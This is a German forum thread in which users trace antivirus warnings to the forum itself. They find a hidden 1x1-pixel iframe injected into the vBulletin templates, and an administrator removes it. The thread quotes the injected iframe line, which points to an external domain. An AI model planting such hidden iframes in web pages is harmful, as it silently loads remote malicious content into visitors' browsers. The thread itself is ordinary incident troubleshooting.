Virus?

[mikdoe]

Hi!
Ich bekomme hier vom Avira Antivirus hin und wieder (zuletzt gestern abend und gerade eben) in der Übersicht "neue Beiträge" eine Viruswarnung:
HTML/Infected.WebPage.Gen2
Bezieht sich dabei immer auf Dateien im Cache des IE9 32Bit.

Und immer damit einher sehe ich im Systray die Java Tasse.
Ich kann definitiv ausschließen, dass das woanders her kommt, habe sonst nichts offen. Hab das jetzt auch mehrfach getestet.

Meldet Avira das falsch oder muss man sich Sorgen machen?
Laut Avira Forum könnte das ein Fehlalarm sein. Aber ich frage mich schon, warum das Java Icon erscheint.
Haben andere das auch?

 

[kkapsner]

Hast du deinen Cache mal geleert? Kam das Problem danach immer noch?

Ich hab' das noch nicht gehabt. (Habe aber auch nicht Avira.)

 

[mikdoe]

Hast du deinen Cache mal geleert? Kam das Problem danach immer noch?

Ja und ja. Nach wie vor einmal täglich.

 

[kkapsner]

Steht was Interessantes in der angemahnten Datei drin?

 

[mikdoe]

Steht was Interessantes in der angemahnten Datei drin?

Muss ich morgen mal schauen, das kommt nur einmal täglich

 

[mikdoe]

Die Datei scheint sich Avira gleich zu krallen, sie war nicht mehr da als ich im 1.000dsten Unterordner angelangt war
Aufgrund der anderen im selben Ordner liegenden Dateien kann ich aber sagen, dass es der Cache-Ordner dieses Forums hier ist.

 

[kkapsner]

Wie heißt die Datei?
Ev. kannst du bei Avira in der Quarantäne die Datei anschauen.

 

[nilsi]

Hatte das Problem auch. Habe auch meinen Cache geleert und alles war wieder wunderbar! gruss

 

[miniA4kuser]

In der Reportdatei bzw. in Log von Avira sollte doch nachzuschauen sein, welche Datei(en) das ist (sind).

 

[mikdoe]

So, jetzt bin ich wieder am Rechner, wo das auftritt, hier hieß die Datei heute morgen:
Temporary Internet Files\Low\Content.IE5\6YO37OX9\od[1].htm

Cache hatte ich auch schon mal geleert, kam dann aber wieder.
Bin ja froh, dass nicht nur ich das Problem habe :icon6:

 

[mikdoe]

Gerade wieder die Meldung, schnell nachgeschaut, Datei war auch da aber 0 Byte.
Ich glaube fast, das liegt an diesem Rechner. Hmmm, Mist.

 

[mikdoe]

Hab den Cache jetzt mal manuell gelöscht und auch auf eine andere Platte verlegt.
Bis jetzt keine neue Viruswarnung. Mal schauen wie es morgen früh ist. War ja bisher immer morgens.

 

[mikdoe]

Warnung ist wieder gekommen.
In der Datei od[1].htm steht das hier:

<div></div>
<iframe src='http://elelelel.info/index.php?showtopic=149040' width='1px' height='1px' frameborder='0' script=1></iframe>

Was soll das denn für ein Virus sein?

 

[miniA4kuser]

Ein 1x1 Pixel großer iframe mit der option script=1 sieht ja auf den ersten Blick nicht so wirklich vertrauenswürdig aus. Zumindest im Zusammenhang mit einer Viruswarnung. Ich traue mich ja gar nicht die URL aus dem source einzugeben...

 

[jspit]

Der iframe ist auch schön im Quellcode zu finden, neben weiteren merkwürdigen iframe's in div's mit style='display:none'.

 

[mikdoe]

Ich traue mich ja gar nicht die URL aus dem source einzugeben...

Ich auch nicht.

Der iframe ist auch schön im Quellcode zu finden, neben weiteren merkwürdigen iframe's in div's mit style='display:none'.

Also ist es definitiv von hier?

Wieso fällt nur immer mir sowas auf?

 

[mo]

so, ich hab nochmal die templates durchsucht und 2 suspekte iframes gelöscht. passts jetzt? ich hab nix mehr.
was mich an dieser ganzen sache ärgert sind die massiven sicherheitslücken vom vBulletin. ständig irgendwelche exploits.

 

[miniA4kuser]

Bis jetzt schauts gut aus. Login und Scripte auf der Main funktionieren wieder.

 

[kkapsner]

Sieht besser aus.

 

[mikdoe]

Avira Meldung ist seit heute weg.
Danke mo!